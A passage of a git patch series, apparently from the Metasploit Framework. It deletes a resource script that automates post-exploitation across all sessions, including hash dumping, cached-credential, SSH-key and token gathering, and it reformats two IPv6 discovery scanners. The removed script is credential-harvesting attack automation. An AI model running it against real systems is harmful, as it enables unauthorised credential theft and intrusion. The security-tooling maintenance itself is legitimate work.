newline at end of file +=end From eea6fac7f2a4128b758ac33e3e57b981f3a25fcc Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 10 Feb 2012 03:14:08 -0600 Subject: [PATCH 13/15] Bad file naming style --- scripts/resource/multi-post-rc-internal.rc | 119 --------------------- 1 file changed, 119 deletions(-) delete mode 100644 scripts/resource/multi-post-rc-internal.rc diff --git a/scripts/resource/multi-post-rc-internal.rc b/scripts/resource/multi-post-rc-internal.rc deleted file mode 100644 index cb93a4c6bf..0000000000 --- a/scripts/resource/multi-post-rc-internal.rc +++ /dev/null @@ -1,119 +0,0 @@ -# multi_post.rc -# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de) - -# This Metasploit RC-File could be used to automate the post-exploitation process -# VERBOSE is used from the global datastore -# check out the meterpreter_commands and the modules_win and modules_lin and modules_multi -# you could add your own post exploitation modules into them - - -if (framework.datastore['VERBOSE'] == "true") #we look in the global datastore for a global VERBOSE option and use it - verbose = 1 #true -else - verbose = 0 -end - -meterpreter_commands = [ - 'sysinfo', - 'getuid', - 'getpid', - 'ps', - 'ipconfig' -] - -modules_win = [ - 'post/windows/gather/hashdump', - 'post/windows/gather/cachedump', - 'post/windows/gather/smart_hashdump', - 'post/windows/gather/enum_tokens', - 'post/windows/gather/enum_domain', - 'post/windows/gather/enum_domain_group_users', - 'post/windows/gather/enum_domain_tokens', - 'post/windows/gather/enum_hostfile', - 'post/windows/gather/enum_ie', - 'post/windows/gather/enum_logged_on_users', - 'post/windows/gather/enum_ms_product_keys', - 'post/windows/gather/credentials/vnc', - 'post/windows/gather/credentials/windows_autologin', - 'post/windows/gather/checkvm', - 'post/windows/gather/enum_applications', - 'post/windows/gather/enum_services', - 'post/windows/gather/enum_shares', - 'post/windows/gather/enum_snmp', - 'post/windows/gather/enum_devices', - 'post/windows/gather/enum_powershell_env' -] # add some more modules or comment some out ... -modules_lin = [ - 'post/linux/gather/hashdump', - 'post/osx/gather/hashdump', - 'post/linux/gather/checkvm', - 'post/linux/gather/enum_cron', - 'post/linux/gather/enum_linux', - 'post/linux/gather/enum_packages', - 'post/linux/gather/enum_services', - 'post/osx/gather/enum_osx' -] -modules_multi = [ - 'post/multi/gather/env', - 'post/multi/gather/ssh_creds' -] - -if (framework.sessions.length > 0) # lets start if we have a session - print_status("starting with post exploitation stuff") - framework.sessions.each_key do |sid| - session = framework.sessions[sid] - #meterpreter commands against every meterpreter session - if(session.type == "meterpreter") - print_line("starting meterpreter commands on session number #{sid}") - meterpreter_commands.each { |command| - print_line("running meterpreter command #{command}") - session.console.run_single("#{command.to_s}") - print_line - } - end - end - - print_status("starting the post exploitation with post exploitation modules") - - # lets start with post exploitation modules - framework.sessions.each_key do |sid| - session = framework.sessions[sid] - ips = session.tunnel_peer.split(":") - print_status("Session ID: #{sid.to_i} - IP: #{ips[0]}") - - modules_multi.each { |modul| # multi -> all sessions - run_single("use #{modul}") - run_single("set SESSION #{sid}") - if (verbose == 1) - run_single("run -j") - else - run_single("run -j -q") - end - } - if(session.platform =~ /win/) # windows sessions - modules_win.each { |modul| - run_single("use #{modul}") - run_single("set SESSION #{sid}") - if (verbose == 1) - run_single("run -j") - else - run_single("run -j -q") - end - } - else # all other sessions -> typical some linux or unix based systems - modules_lin.each { |modul| - run_single("use #{modul}") - run_single("set SESSION #{sid}") - if (verbose == 1) - run_single("run -j") - else - run_single("run -j -q") - end - } - end - end -else - print_error("no sessions available") -end -run_single("back") - \ No newline at end of file From 4b47a9e66fa685eb2c60c73598a22374a4cabdf7 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 10 Feb 2012 03:16:37 -0600 Subject: [PATCH 14/15] Be gone, whitespace. --- .../scanner/discovery/ipv6_multicast_ping.rb | 32 +++++++++---------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index c543662412..625fca2b80 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -65,24 +65,24 @@ class Metasploit3 < Msf::Auxiliary # Send ping print_status("Sending multicast pings...") dmac = "33:33:00:00:00:01" - + # Figure out our source address by the link-local interface shost = ipv6_link_address - - # m-1-k-3: added some more multicast addresses from wikipedia: https://en.wikipedia.org/wiki/Multicast_address#IPv6 - ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all nodes - ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all routers - ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All nodes on the local network segment - ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All routers on the local network segment - ping6("FF02::5", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllSPF routers - ping6("FF02::6", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllDR routers - ping6("FF02::9", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #RIP routers - ping6("FF02::a", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #EIGRP routers - ping6("FF02::d", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #PIM routers - ping6("FF02::16", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #MLDv2 reports (defined in RFC 3810) - ping6("ff02::1:2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers and relay agents on the local network site (defined in RFC 3315) - ping6("ff05::1:3", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers on the local network site (defined in RFC 3315) - + + # m-1-k-3: added some more multicast addresses from wikipedia: https://en.wikipedia.org/wiki/Multicast_address#IPv6 + ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all nodes + ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all routers + ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All nodes on the local network segment + ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All routers on the local network segment + ping6("FF02::5", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllSPF routers + ping6("FF02::6", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllDR routers + ping6("FF02::9", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #RIP routers + ping6("FF02::a", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #EIGRP routers + ping6("FF02::d", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #PIM routers + ping6("FF02::16", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #MLDv2 reports (defined in RFC 3810) + ping6("ff02::1:2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers and relay agents on the local network site (defined in RFC 3315) + ping6("ff05::1:3", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers on the local network site (defined in RFC 3315) + # Listen for host advertisments print_status("Listening for responses...") listen_for_ping_response() From fe69a27bf18fa562224ba13eba16413087c202f7 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 10 Feb 2012 03:22:51 -0600 Subject: [PATCH 15/15] Fix indent level and type --- .../auxiliary/scanner/discovery/ipv6_neighbor.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index 9eed27dded..4164bb9f5f 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -132,13 +132,13 @@ class Metasploit3 < Msf::Auxiliary next if not addr print_status(sprintf(" %16s maps to %s",addr[:ipv4], addr[:ipv6])) - report_note( - :host => addr[:ipv4], - :proto => 'IP', - :sname => 'all', - :type => 'IPv4 to IPv6 mapping', - :data => "system with IPv4 address #{addr[:ipv4]} matches to IPv6 address #{addr[:ipv6]}" - ) # with this we have the results in our database + report_note( + :host => addr[:ipv4], + :proto => 'IP', + :sname => 'all', + :type => 'ipv4.ipv6.mapping', + :data => "system with IPv4 address #{addr[:ipv4]} matches to IPv6 address #{addr[:ipv6]}" + ) # with this we have the results in our database end end